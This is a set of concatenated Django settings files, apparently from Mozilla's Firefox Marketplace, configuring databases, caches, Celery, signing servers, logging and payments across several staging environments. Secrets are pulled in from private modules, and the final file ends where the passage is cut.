GOOGLE_ANALYTICS_DOMAIN = 'marketplace.firefox.com'
VALIDATOR_IAF_URLS = ['https://marketplace.firefox.com',
'https://marketplace.allizom.org',
'https://identity-stage-marketplace.allizom.org',
'https://marketplace-dev.allizom.org',
'https://marketplace-altdev.allizom.org']
if getattr(private_mkt, 'LOAD_TESTING', False):
# mock the authentication and use django_fakeauth for this
AUTHENTICATION_BACKENDS = ('django_fakeauth.FakeAuthBackend',)\
+ AUTHENTICATION_BACKENDS
MIDDLEWARE_CLASSES.insert(
MIDDLEWARE_CLASSES.index('access.middleware.ACLMiddleware'),
'django_fakeauth.FakeAuthMiddleware')
FAKEAUTH_TOKEN = private_mkt.FAKEAUTH_TOKEN
# we are also creating access tokens for OAuth, here are the keys and
# secrets used for them
API_PASSWORD = getattr(private_mkt, 'API_PASSWORD', FAKEAUTH_TOKEN)
AMO_LANGUAGES = AMO_LANGUAGES + ('dbg',)
LANGUAGES = lazy(lazy_langs, dict)(AMO_LANGUAGES)
LANGUAGE_URL_MAP = dict([(i.lower(), i) for i in AMO_LANGUAGES])
BLUEVIA_SECRET = private_mkt.BLUEVIA_SECRET
#Bug 748403
SIGNING_SERVER = private_mkt.SIGNING_SERVER
SIGNING_SERVER_ACTIVE = True
SIGNING_VALID_ISSUERS = ['identity-stage-marketplace-cdn.allizom.org']
#Bug 793876
SIGNED_APPS_KEY = private_mkt.SIGNED_APPS_KEY
SIGNED_APPS_SERVER_ACTIVE = True
SIGNED_APPS_SERVER = private_mkt.SIGNED_APPS_SERVER
SIGNED_APPS_REVIEWER_SERVER_ACTIVE = True
SIGNED_APPS_REVIEWER_SERVER = private_mkt.SIGNED_APPS_REVIEWER_SERVER
HEKA_CONF = {
'plugins': {'cef': ('heka_cef.cef_plugin:config_plugin', {
'syslog_facility': 'LOCAL4',
# CEF_PRODUCT is defined in settings_base
'syslog_ident': CEF_PRODUCT,
'syslog_priority': 'INFO'
}),
},
'stream': {
'class': 'heka.streams.UdpStream',
'host': splitstrip(private.HEKA_CONF_SENDER_HOST),
'port': private.HEKA_CONF_SENDER_PORT,
},
'logger': 'marketplace-identity-stage',
}
HEKA = client_from_dict_config(HEKA_CONF)
USE_HEKA_FOR_CEF = True
# See mkt/settings.py for more info.
APP_PURCHASE_KEY = DOMAIN
APP_PURCHASE_AUD = DOMAIN
APP_PURCHASE_TYP = 'mozilla-stage/payments/pay/v1'
APP_PURCHASE_SECRET = private_mkt.APP_PURCHASE_SECRET
MONOLITH_PASSWORD = private_mkt.MONOLITH_PASSWORD
# This is mainly for Marionette tests.
WEBAPP_MANIFEST_NAME = 'Marketplace Identity Stage'
ENABLE_API_ERROR_SERVICE = True
ES_USE_PLUGINS = True
########NEW FILE########
__FILENAME__ = settings_base
"""private_base will be populated from puppet and placed in this directory"""
import logging
import os
import dj_database_url
from lib.settings_base import CACHE_PREFIX, ES_INDEXES, KNOWN_PROXIES, LOGGING
from .. import splitstrip
import private_base as private
ENGAGE_ROBOTS = False
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = private.EMAIL_HOST
DEBUG = False
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = False
SESSION_COOKIE_SECURE = True
REDIRECT_SECRET_KEY = private.REDIRECT_SECRET_KEY
ADMINS = ()
DATABASES = {}
DATABASES['default'] = dj_database_url.parse(private.DATABASES_DEFAULT_URL)
DATABASES['default']['ENGINE'] = 'mysql_pool'
DATABASES['default']['sa_pool_key'] = 'master'
DATABASES['default']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave'] = dj_database_url.parse(private.DATABASES_SLAVE_URL)
DATABASES['slave']['ENGINE'] = 'mysql_pool'
DATABASES['slave']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave']['sa_pool_key'] = 'slave'
SERVICES_DATABASE = dj_database_url.parse(private.SERVICES_DATABASE_URL)
DATABASE_POOL_ARGS = {
'max_overflow': 10,
'pool_size': 5,
'recycle': 30
}
SLAVE_DATABASES = ['slave']
CACHES = {
'default': {
'BACKEND': 'caching.backends.memcached.MemcachedCache',
# 'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
# 'BACKEND': 'memcachepool.cache.UMemcacheCache',
'LOCATION': splitstrip(private.CACHES_DEFAULT_LOCATION),
'TIMEOUT': 500,
'KEY_PREFIX': CACHE_PREFIX,
},
}
SECRET_KEY = private.SECRET_KEY
LOG_LEVEL = logging.DEBUG
## Celery
BROKER_URL = private.BROKER_URL
CELERY_ALWAYS_EAGER = True
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
NETAPP_STORAGE = private.NETAPP_STORAGE_ROOT + '/shared_storage'
MIRROR_STAGE_PATH = private.NETAPP_STORAGE_ROOT + '/public-staging'
GUARDED_ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/guarded-addons'
UPLOADS_PATH = NETAPP_STORAGE + '/uploads'
USERPICS_PATH = UPLOADS_PATH + '/userpics'
ADDON_ICONS_PATH = UPLOADS_PATH + '/addon_icons'
COLLECTIONS_ICON_PATH = UPLOADS_PATH + '/collection_icons'
IMAGEASSETS_PATH = UPLOADS_PATH + '/imageassets'
REVIEWER_ATTACHMENTS_PATH = UPLOADS_PATH + '/reviewer_attachment'
PREVIEWS_PATH = UPLOADS_PATH + '/previews'
SIGNED_APPS_PATH = NETAPP_STORAGE + '/signed_apps'
SIGNED_APPS_REVIEWER_PATH = NETAPP_STORAGE + '/signed_apps_reviewer'
PREVIEW_THUMBNAIL_PATH = PREVIEWS_PATH + '/thumbs/%s/%d.png'
PREVIEW_FULL_PATH = PREVIEWS_PATH + '/full/%s/%d.%s'
HERA = []
LOGGING['loggers'].update({
'z.task': { 'level': logging.DEBUG },
'z.hera': { 'level': logging.INFO },
'z.redis': { 'level': logging.DEBUG },
'z.pool': { 'level': logging.ERROR },
})
REDIS_BACKEND = private.REDIS_BACKENDS_CACHE
REDIS_BACKENDS = {
'cache': private.REDIS_BACKENDS_CACHE,
'cache_slave': private.REDIS_BACKENDS_CACHE_SLAVE,
'master': private.REDIS_BACKENDS_MASTER,
'slave': private.REDIS_BACKENDS_SLAVE,
}
CACHE_MACHINE_USE_REDIS = True
RECAPTCHA_PUBLIC_KEY = private.RECAPTCHA_PUBLIC_KEY
RECAPTCHA_PRIVATE_KEY = private.RECAPTCHA_PRIVATE_KEY
RECAPTCHA_URL = ('https://www.google.com/recaptcha/api/challenge?k=%s' % RECAPTCHA_PUBLIC_KEY)
TMP_PATH = os.path.join(NETAPP_STORAGE, 'tmp')
ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/files'
SPIDERMONKEY = '/usr/bin/tracemonkey'
# Remove DetectMobileMiddleware from middleware in production.
detect = 'mobility.middleware.DetectMobileMiddleware'
csp = 'csp.middleware.CSPMiddleware'
RESPONSYS_ID = private.RESPONSYS_ID
CRONJOB_LOCK_PREFIX = 'mkt-landfill'
BUILDER_SECRET_KEY = private.BUILDER_SECRET_KEY
BUILDER_VERSIONS_URL = "https://builder-addons-dev.allizom.org/repackage/sdk-versions/"
ES_HOSTS = splitstrip(private.ES_HOSTS)
ES_URLS = ['http://%s' % h for h in ES_HOSTS]
ES_INDEXES = dict((k, '%s_landfill' % v) for k, v in ES_INDEXES.items())
BUILDER_UPGRADE_URL = "https://builder-addons-dev.allizom.org/repackage/rebuild/"
STATSD_HOST = private.STATSD_HOST
STATSD_PORT = private.STATSD_PORT
STATSD_PREFIX = private.STATSD_PREFIX
GRAPHITE_HOST = private.GRAPHITE_HOST
GRAPHITE_PORT = private.GRAPHITE_PORT
GRAPHITE_PREFIX = private.GRAPHITE_PREFIX
CEF_PRODUCT = STATSD_PREFIX
ES_TIMEOUT = 60
EXPOSE_VALIDATOR_TRACEBACKS = True
KNOWN_PROXIES += ['10.2.83.105',
'10.2.83.106',
'10.2.83.107',
'10.8.83.200',
'10.8.83.201',
'10.8.83.202',
'10.8.83.203',
'10.8.83.204',
'10.8.83.210',
'10.8.83.211',
'10.8.83.212',
'10.8.83.213',
'10.8.83.214',
'10.8.83.215',
'10.8.83.251',
'10.8.83.252',
'10.8.83.253',
]
NEW_FEATURES = True
REDIRECT_URL = 'https://outgoing.allizom.org/v1/'
CLEANCSS_BIN = 'cleancss'
UGLIFY_BIN = 'uglifyjs'
CELERYD_TASK_SOFT_TIME_LIMIT = 240
LESS_PREPROCESS = True
XSENDFILE_HEADER = 'X-Accel-Redirect'
HEKA_CONF = {
'plugins': {'cef': ('heka_cef.cef_plugin:config_plugin', {})},
'stream': {
'class': 'heka.streams.UdpStream',
'host': splitstrip(private.HEKA_CONF_SENDER_HOST),
'port': private.HEKA_CONF_SENDER_PORT,
},
}
USE_HEKA_FOR_CEF = True
USE_HEKA_FOR_TASTYPIE = True
ALLOW_SELF_REVIEWS = True
AES_KEYS = private.AES_KEYS
########NEW FILE########
__FILENAME__ = settings_mkt
"""private_mkt will be populated from puppet and placed in this directory"""
from lib.settings_base import *
from mkt.settings import *
from settings_base import *
import private_mkt
SERVER_EMAIL = '[email protected]'
DOMAIN = "landfill-mkt.allizom.org"
SITE_URL = 'https://landfill-mkt.allizom.org'
SERVICES_URL = SITE_URL
STATIC_URL = 'https://landfill-mkt-cdn.allizom.org/'
LOCAL_MIRROR_URL = '%s_files' % STATIC_URL
MIRROR_URL = LOCAL_MIRROR_URL
CSP_STATIC_URL = STATIC_URL[:-1]
CSP_IMG_SRC = CSP_IMG_SRC + (CSP_STATIC_URL,)
CSP_SCRIPT_SRC = CSP_SCRIPT_SRC + (CSP_STATIC_URL,)
CSP_STYLE_SRC = CSP_STYLE_SRC + (CSP_STATIC_URL,)
ADDON_ICON_URL = "%s/%s/%s/images/addon_icon/%%d-%%d.png?modified=%%s" % (STATIC_URL, LANGUAGE_CODE, DEFAULT_APP)
ADDON_ICON_URL = STATIC_URL + 'img/uploads/addon_icons/%s/%s-%s.png?modified=%s'
PREVIEW_THUMBNAIL_URL = (STATIC_URL +
'img/uploads/previews/thumbs/%s/%d.png?modified=%d')
PREVIEW_FULL_URL = (STATIC_URL +
'img/uploads/previews/full/%s/%d.%s?modified=%d')
# paths for uploaded extensions
FILES_URL = STATIC_URL + "%s/%s/downloads/file/%d/%s?src=%s"
SESSION_COOKIE_DOMAIN = ".%s" % DOMAIN
# paths for uploaded extensions
USERPICS_URL = STATIC_URL + 'img/uploads/userpics/%s/%s/%s.png?modified=%d'
COLLECTION_ICON_URL = STATIC_URL + '/img/uploads/collection_icons/%s/%s.png?m=%s'
MEDIA_URL = STATIC_URL + 'media/'
ADDON_ICONS_DEFAULT_URL = MEDIA_URL + 'img/hub'
ADDON_ICON_BASE_URL = MEDIA_URL + 'img/icons/'
PRODUCT_ICON_URL = STATIC_URL + 'product-icons'
CACHE_PREFIX = 'landfill.mkt.%s' % CACHE_PREFIX
CACHE_MIDDLEWARE_KEY_PREFIX = CACHE_PREFIX
CACHES['default']['KEY_PREFIX'] = CACHE_PREFIX
SYSLOG_TAG = "http_app_addons_marketplacelandfill"
SYSLOG_TAG2 = "http_app_addons_marketplacelandfill_timer"
SYSLOG_CSP = "http_app_addons_marketplacelandfill_csp"
STATSD_PREFIX = 'marketplace-landfill'
## Celery
BROKER_URL = private_mkt.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
WEBAPPS_RECEIPT_KEY = private_mkt.WEBAPPS_RECEIPT_KEY
WEBAPPS_RECEIPT_URL = private_mkt.WEBAPPS_RECEIPT_URL
APP_PREVIEW = True
WEBAPPS_UNIQUE_BY_DOMAIN = False
SENTRY_DSN = private_mkt.SENTRY_DSN
WEBAPPS_PUBLIC_KEY_DIRECTORY = NETAPP_STORAGE + '/public_keys'
PRODUCT_ICON_PATH = NETAPP_STORAGE + '/product-icons'
SOLITUDE_HOSTS = ('https://payments-dev.allizom.org',)
VALIDATOR_IAF_URLS = ['https://marketplace.firefox.com',
'https://marketplace.allizom.org',
'https://marketplace-dev.allizom.org',
'https://landfill-mkt.allizom.org']
AMO_LANGUAGES = AMO_LANGUAGES + ('dbg',)
LANGUAGES = lazy(lazy_langs, dict)(AMO_LANGUAGES)
LANGUAGE_URL_MAP = dict([(i.lower(), i) for i in AMO_LANGUAGES])
BLUEVIA_SECRET = private_mkt.BLUEVIA_SECRET
#Bug 748403
SIGNING_SERVER = private_mkt.SIGNING_SERVER
SIGNING_SERVER_ACTIVE = True
SIGNING_VALID_ISSUERS = ['marketplace-dev-cdn.allizom.org']
#Bug 793876
SIGNED_APPS_KEY = private_mkt.SIGNED_APPS_KEY
SIGNED_APPS_SERVER_ACTIVE = False
HEKA_CONF['logger'] = 'addons-marketplace-landfill'
HEKA_CONF['plugins']['raven'] = ('heka_raven.raven_plugin:config_plugin', {'dsn': private_mkt.SENTRY_DSN})
HEKA = client_from_dict_config(HEKA_CONF)
########NEW FILE########
__FILENAME__ = settings_base
"""private_base will be populated from puppet and placed in this directory"""
import logging
import os
import dj_database_url
from lib.settings_base import (ALLOWED_HOSTS, CACHE_PREFIX, ES_INDEXES,
KNOWN_PROXIES, LOGGING, HOSTNAME)
from .. import splitstrip
import private_base as private
ALLOWED_HOSTS += ['.mozflare.net']
ENGAGE_ROBOTS = False
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = private.EMAIL_HOST
DEBUG = False
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = False
SESSION_COOKIE_SECURE = True
REDIRECT_SECRET_KEY = private.REDIRECT_SECRET_KEY
ADMINS = ()
DATABASES = {}
DATABASES['default'] = dj_database_url.parse(private.DATABASES_DEFAULT_URL)
DATABASES['default']['ENGINE'] = 'mysql_pool'
DATABASES['default']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave'] = dj_database_url.parse(private.DATABASES_SLAVE_URL)
DATABASES['slave']['ENGINE'] = 'mysql_pool'
DATABASES['slave']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
SERVICES_DATABASE = dj_database_url.parse(private.SERVICES_DATABASE_URL)
DATABASE_POOL_ARGS = {
'max_overflow': 10,
'pool_size': 5,
'recycle': 30
}
SLAVE_DATABASES = ['slave']
CACHES = {
'default': {
'BACKEND': 'caching.backends.memcached.MemcachedCache',
'LOCATION': splitstrip(private.CACHES_DEFAULT_LOCATION),
'TIMEOUT': 500,
'KEY_PREFIX': CACHE_PREFIX,
},
}
SECRET_KEY = private.SECRET_KEY
LOG_LEVEL = logging.DEBUG
## Celery
BROKER_URL = private.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
NETAPP_STORAGE = private.NETAPP_STORAGE_ROOT + '/shared_storage'
MIRROR_STAGE_PATH = private.NETAPP_STORAGE_ROOT + '/public-staging'
GUARDED_ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/guarded-addons'
UPLOADS_PATH = NETAPP_STORAGE + '/uploads'
USERPICS_PATH = UPLOADS_PATH + '/userpics'
ADDON_ICONS_PATH = UPLOADS_PATH + '/addon_icons'
COLLECTIONS_ICON_PATH = UPLOADS_PATH + '/collection_icons'
IMAGEASSETS_PATH = UPLOADS_PATH + '/imageassets'
REVIEWER_ATTACHMENTS_PATH = UPLOADS_PATH + '/reviewer_attachment'
PREVIEWS_PATH = UPLOADS_PATH + '/previews'
SIGNED_APPS_PATH = NETAPP_STORAGE + '/signed_apps'
SIGNED_APPS_REVIEWER_PATH = NETAPP_STORAGE + '/signed_apps_reviewer'
PREVIEW_THUMBNAIL_PATH = PREVIEWS_PATH + '/thumbs/%s/%d.png'
PREVIEW_FULL_PATH = PREVIEWS_PATH + '/full/%s/%d.%s'
HERA = []
LOGGING['loggers'].update({
'z.task': {'level': logging.DEBUG},
'z.hera': {'level': logging.INFO},
'z.redis': {'level': logging.DEBUG},
'z.pool': {'level': logging.ERROR},
})
REDIS_BACKEND = private.REDIS_BACKENDS_CACHE
REDIS_BACKENDS = {
'cache': private.REDIS_BACKENDS_CACHE,
'cache_slave': private.REDIS_BACKENDS_CACHE_SLAVE,
'master': private.REDIS_BACKENDS_MASTER,
'slave': private.REDIS_BACKENDS_SLAVE,
}
CACHE_MACHINE_USE_REDIS = True
RECAPTCHA_PUBLIC_KEY = private.RECAPTCHA_PUBLIC_KEY
RECAPTCHA_PRIVATE_KEY = private.RECAPTCHA_PRIVATE_KEY
RECAPTCHA_URL = ('https://www.google.com/recaptcha/api/challenge?k=%s' % RECAPTCHA_PUBLIC_KEY)
TMP_PATH = os.path.join(NETAPP_STORAGE, 'tmp')
ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/files'
SPIDERMONKEY = '/usr/bin/tracemonkey'
# Remove DetectMobileMiddleware from middleware in production.
detect = 'mobility.middleware.DetectMobileMiddleware'
csp = 'csp.middleware.CSPMiddleware'
RESPONSYS_ID = private.RESPONSYS_ID
CRONJOB_LOCK_PREFIX = 'marketplace-stage'
BUILDER_SECRET_KEY = private.BUILDER_SECRET_KEY
BUILDER_VERSIONS_URL = "https://builder-addons.allizom.org/repackage/sdk-versions/"
GOOGLE_ANALYTICS_CREDENTIALS = private.GOOGLE_ANALYTICS_CREDENTIALS
GOOGLE_API_CREDENTIALS = private.GOOGLE_API_CREDENTIALS
ES_HOSTS = splitstrip(private.ES_HOSTS)
ES_URLS = ['http://%s' % h for h in ES_HOSTS]
ES_INDEXES = dict((k, '%s_stage' % v) for k, v in ES_INDEXES.items())
BUILDER_UPGRADE_URL = "https://builder-addons.allizom.org/repackage/rebuild/"
STATSD_HOST = private.STATSD_HOST
STATSD_PORT = private.STATSD_PORT
STATSD_PREFIX = private.STATSD_PREFIX
GRAPHITE_HOST = private.GRAPHITE_HOST
GRAPHITE_PORT = private.GRAPHITE_PORT
GRAPHITE_PREFIX = private.GRAPHITE_PREFIX
CEF_PRODUCT = STATSD_PREFIX
ES_TIMEOUT = 60
EXPOSE_VALIDATOR_TRACEBACKS = True
KNOWN_PROXIES += ['10.2.83.105',
'10.2.83.106',
'10.2.83.107',
'10.8.83.200',
'10.8.83.201',
'10.8.83.202',
'10.8.83.203',
'10.8.83.204',
'10.8.83.210',
'10.8.83.211',
'10.8.83.212',
'10.8.83.213',
'10.8.83.214',
'10.8.83.215',
'10.8.83.251',
'10.8.83.252',
'10.8.83.253',
]
NEW_FEATURES = True
REDIRECT_URL = 'https://outgoing.allizom.org/v1/'
CLEANCSS_BIN = 'cleancss'
UGLIFY_BIN = 'uglifyjs'
CELERYD_TASK_SOFT_TIME_LIMIT = 240
LESS_PREPROCESS = True
XSENDFILE_HEADER = 'X-Accel-Redirect'
ALLOW_SELF_REVIEWS = True
MONOLITH_SERVER = 'https://monolith.allizom.org'
GEOIP_URL = 'http://geo.marketplace.allizom.org'
API_THROTTLE = False
NEWRELIC_ENABLE = False
AES_KEYS = private.AES_KEYS
########NEW FILE########
__FILENAME__ = settings_mkt
"""private_mkt will be populated from puppet and placed in this directory"""
from lib.settings_base import *
from mkt.settings import *
from settings_base import *
import private_mkt
SERVER_EMAIL = '[email protected]'
DOMAIN = "payments-alt.allizom.org"
SITE_URL = 'https://%s' % DOMAIN
SERVICES_URL = SITE_URL
STATIC_URL = os.getenv('CUSTOM_CDN', 'https://payments-alt-cdn.allizom.org/')
LOCAL_MIRROR_URL = '%s_files' % STATIC_URL
MIRROR_URL = LOCAL_MIRROR_URL
CSP_STATIC_URL = STATIC_URL[:-1]
CSP_IMG_SRC = CSP_IMG_SRC + (CSP_STATIC_URL,)
CSP_SCRIPT_SRC = CSP_SCRIPT_SRC + (CSP_STATIC_URL,)
CSP_STYLE_SRC = CSP_STYLE_SRC + (CSP_STATIC_URL,)
ADDON_ICON_URL = "%s/%s/%s/images/addon_icon/%%d-%%d.png?modified=%%s" % (STATIC_URL, LANGUAGE_CODE, DEFAULT_APP)
ADDON_ICON_URL = STATIC_URL + 'img/uploads/addon_icons/%s/%s-%s.png?modified=%s'
PREVIEW_THUMBNAIL_URL = (STATIC_URL +
'img/uploads/previews/thumbs/%s/%d.png?modified=%d')
PREVIEW_FULL_URL = (STATIC_URL +
'img/uploads/previews/full/%s/%d.%s?modified=%d')
# paths for uploaded extensions
FILES_URL = STATIC_URL + "%s/%s/downloads/file/%d/%s?src=%s"
SESSION_COOKIE_DOMAIN = ".%s" % DOMAIN
# paths for uploaded extensions
USERPICS_URL = STATIC_URL + 'img/uploads/userpics/%s/%s/%s.png?modified=%d'
COLLECTION_ICON_URL = STATIC_URL + '/img/uploads/collection_icons/%s/%s.png?m=%s'
MEDIA_URL = STATIC_URL + 'media/'
ADDON_ICONS_DEFAULT_URL = MEDIA_URL + 'img/hub'
ADDON_ICON_BASE_URL = MEDIA_URL + 'img/icons/'
PRODUCT_ICON_URL = STATIC_URL + 'product-icons'
CACHE_PREFIX = 'stage.mkt.%s' % CACHE_PREFIX
CACHE_MIDDLEWARE_KEY_PREFIX = CACHE_PREFIX
CACHES['default']['KEY_PREFIX'] = CACHE_PREFIX
LOG_LEVEL = logging.DEBUG
# The django statsd client to use, see django-statsd for more.
#STATSD_CLIENT = 'django_statsd.clients.moz_heka'
SYSLOG_TAG = "http_app_addons_marketplace_altpay"
SYSLOG_TAG2 = "http_app_addons_marketplacestage_timer"
SYSLOG_CSP = "http_app_addons_marketplacestage_csp"
STATSD_PREFIX = 'marketplace-stage'
## Celery
BROKER_URL = private_mkt.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
WEBAPPS_RECEIPT_KEY = private_mkt.WEBAPPS_RECEIPT_KEY
WEBAPPS_RECEIPT_URL = private_mkt.WEBAPPS_RECEIPT_URL
APP_PREVIEW = True
WEBAPPS_UNIQUE_BY_DOMAIN = True
SENTRY_DSN = private_mkt.SENTRY_DSN
SOLITUDE_HOSTS = ('https://payments-alt-solitude.allizom.org',)
SOLITUDE_OAUTH = {'key': private_mkt.SOLITUDE_OAUTH_KEY,
'secret': private_mkt.SOLITUDE_OAUTH_SECRET}
WEBAPPS_PUBLIC_KEY_DIRECTORY = NETAPP_STORAGE + '/public_keys'
PRODUCT_ICON_PATH = NETAPP_STORAGE + '/product-icons'
DUMPED_APPS_PATH = NETAPP_STORAGE + '/dumped-apps'
DUMPED_USERS_PATH = NETAPP_STORAGE + '/dumped-users'
GOOGLE_ANALYTICS_DOMAIN = 'marketplace.firefox.com'
VALIDATOR_IAF_URLS = ['https://marketplace.firefox.com',
'https://marketplace.allizom.org',
'https://payments-alt.allizom.org',
'https://marketplace-dev.allizom.org',
'https://marketplace-altdev.allizom.org']
if getattr(private_mkt, 'LOAD_TESTING', False):
# mock the authentication and use django_fakeauth for this
AUTHENTICATION_BACKENDS = ('django_fakeauth.FakeAuthBackend',)\
+ AUTHENTICATION_BACKENDS
MIDDLEWARE_CLASSES.insert(
MIDDLEWARE_CLASSES.index('access.middleware.ACLMiddleware'),
'django_fakeauth.FakeAuthMiddleware')
FAKEAUTH_TOKEN = private_mkt.FAKEAUTH_TOKEN
# we are also creating access tokens for OAuth, here are the keys and
# secrets used for them
API_PASSWORD = getattr(private_mkt, 'API_PASSWORD', FAKEAUTH_TOKEN)
AMO_LANGUAGES = AMO_LANGUAGES + ('dbg',)
LANGUAGES = lazy(lazy_langs, dict)(AMO_LANGUAGES)
LANGUAGE_URL_MAP = dict([(i.lower(), i) for i in AMO_LANGUAGES])
BLUEVIA_SECRET = private_mkt.BLUEVIA_SECRET
#Bug 748403
SIGNING_SERVER = private_mkt.SIGNING_SERVER
SIGNING_SERVER_ACTIVE = True
SIGNING_VALID_ISSUERS = [DOMAIN]
#Bug 793876
SIGNED_APPS_KEY = private_mkt.SIGNED_APPS_KEY
SIGNED_APPS_SERVER_ACTIVE = True
SIGNED_APPS_SERVER = private_mkt.SIGNED_APPS_SERVER
SIGNED_APPS_REVIEWER_SERVER_ACTIVE = True
SIGNED_APPS_REVIEWER_SERVER = private_mkt.SIGNED_APPS_REVIEWER_SERVER
HEKA_CONF = {
'plugins': {'cef': ('heka_cef.cef_plugin:config_plugin', {
'syslog_facility': 'LOCAL4',
# CEF_PRODUCT is defined in settings_base
'syslog_ident': CEF_PRODUCT,
'syslog_priority': 'INFO'
}),
},
'stream': {
'class': 'heka.streams.UdpStream',
'host': splitstrip(private.HEKA_CONF_SENDER_HOST),
'port': private.HEKA_CONF_SENDER_PORT,
},
'logger': 'addons-marketplace-stage',
}
HEKA = client_from_dict_config(HEKA_CONF)
USE_HEKA_FOR_CEF = True
# See mkt/settings.py for more info.
APP_PURCHASE_KEY = DOMAIN
APP_PURCHASE_AUD = DOMAIN
APP_PURCHASE_TYP = 'mozilla-alt/payments/pay/v1'
APP_PURCHASE_SECRET = private_mkt.APP_PURCHASE_SECRET
MONOLITH_PASSWORD = private_mkt.MONOLITH_PASSWORD
# This is mainly for Marionette tests.
WEBAPP_MANIFEST_NAME = 'Marketplace Stage'
ENABLE_API_ERROR_SERVICE = True
NEWRELIC_INI = None
ES_USE_PLUGINS = True
BANGO_BASE_PORTAL_URL = 'https://mozilla.bango.com/login/al.aspx?'
MONOLITH_INDEX = 'mktstage-time_*'
# IARC content ratings.
IARC_ENV = 'test'
IARC_MOCK = False
IARC_PASSWORD = private_mkt.IARC_PASSWORD
IARC_PLATFORM = 'Firefox'
IARC_SERVICE_ENDPOINT = 'https://www.globalratings.com/IARCDEMOService/IARCServices.svc'
IARC_STOREFRONT_ID = 4
IARC_SUBMISSION_ENDPOINT = 'https://www.globalratings.com/IARCDEMORating/Submission.aspx'
IARC_ALLOW_CERT_REUSE = True
PRE_GENERATE_APKS = False
PRE_GENERATE_APK_URL = \
'https://apk-controller.stage.mozaws.net/application.apk'
# Bug 1002569.
PAYMENT_PROVIDERS = ['bango', 'boku']
DEFAULT_PAYMENT_PROVIDER = 'bango'
########NEW FILE########
__FILENAME__ = settings_base
import logging
import os
import dj_database_url
from lib.settings_base import CACHE_PREFIX, KNOWN_PROXIES, LOGGING, HOSTNAME
from .. import splitstrip
import private_base as private
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = private.EMAIL_HOST
SEND_REAL_EMAIL = True
ENGAGE_ROBOTS = True
DEBUG = False
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = False
SESSION_COOKIE_SECURE = True
REDIRECT_SECRET_KEY = private.REDIRECT_SECRET_KEY
ADMINS = ()
DATABASES = {}
DATABASES['default'] = dj_database_url.parse(private.DATABASES_DEFAULT_URL)
DATABASES['default']['ENGINE'] = 'mysql_pool'
DATABASES['default']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave'] = dj_database_url.parse(private.DATABASES_SLAVE_URL)
DATABASES['slave']['ENGINE'] = 'mysql_pool'
DATABASES['slave']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASE_POOL_ARGS = {
'max_overflow': 10,
'pool_size': 5,
'recycle': 300
}
SERVICES_DATABASE = dj_database_url.parse(private.SERVICES_DATABASE_URL)
SLAVE_DATABASES = ['slave']
CACHES = {
'default': {
'BACKEND': 'caching.backends.memcached.MemcachedCache',
'LOCATION': splitstrip(private.CACHES_DEFAULT_LOCATION),
'TIMEOUT': 500,
'KEY_PREFIX': CACHE_PREFIX,
},
}
## Celery
BROKER_URL = private.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
BROKER_CONNECTION_TIMEOUT = 0.1
NETAPP_STORAGE_ROOT = private.NETAPP_STORAGE_ROOT
NETAPP_STORAGE = NETAPP_STORAGE_ROOT + '/shared_storage'
GUARDED_ADDONS_PATH = NETAPP_STORAGE_ROOT + '/guarded-addons'
MIRROR_STAGE_PATH = NETAPP_STORAGE_ROOT + '/public-staging'
UPLOADS_PATH = NETAPP_STORAGE + '/uploads'
USERPICS_PATH = UPLOADS_PATH + '/userpics'
ADDON_ICONS_PATH = UPLOADS_PATH + '/addon_icons'
COLLECTIONS_ICON_PATH = UPLOADS_PATH + '/collection_icons'
IMAGEASSETS_PATH = UPLOADS_PATH + '/imageassets'
REVIEWER_ATTACHMENTS_PATH = UPLOADS_PATH + '/reviewer_attachment'
PREVIEWS_PATH = UPLOADS_PATH + '/previews'
PREVIEW_THUMBNAIL_PATH = PREVIEWS_PATH + '/thumbs/%s/%d.png'
PREVIEW_FULL_PATH = PREVIEWS_PATH + '/full/%s/%d.png'
SIGNED_APPS_PATH = NETAPP_STORAGE + '/signed_apps'
SIGNED_APPS_REVIEWER_PATH = NETAPP_STORAGE + '/signed_apps_reviewer'
HERA = []
LOG_LEVEL = logging.DEBUG
LOGGING['loggers'].update({
'amqp': {'level': logging.WARNING},
'raven': {'level': logging.WARNING},
'requests': {'level': logging.WARNING},
'z.addons': {'level': logging.INFO},
'z.task': {'level': logging.DEBUG},
'z.hera': {'level': logging.INFO},
'z.redis': {'level': logging.DEBUG},
'z.pool': {'level': logging.ERROR},
})
REDIS_BACKEND = private.REDIS_BACKENDS_CACHE
REDIS_BACKENDS = {
'cache': REDIS_BACKEND,
'cache_slave': private.REDIS_BACKENDS_CACHE_SLAVE,
'master': private.REDIS_BACKENDS_MASTER,
'slave': private.REDIS_BACKENDS_SLAVE,
}
CACHE_MACHINE_USE_REDIS = True
RECAPTCHA_PUBLIC_KEY = private.RECAPTCHA_PUBLIC_KEY
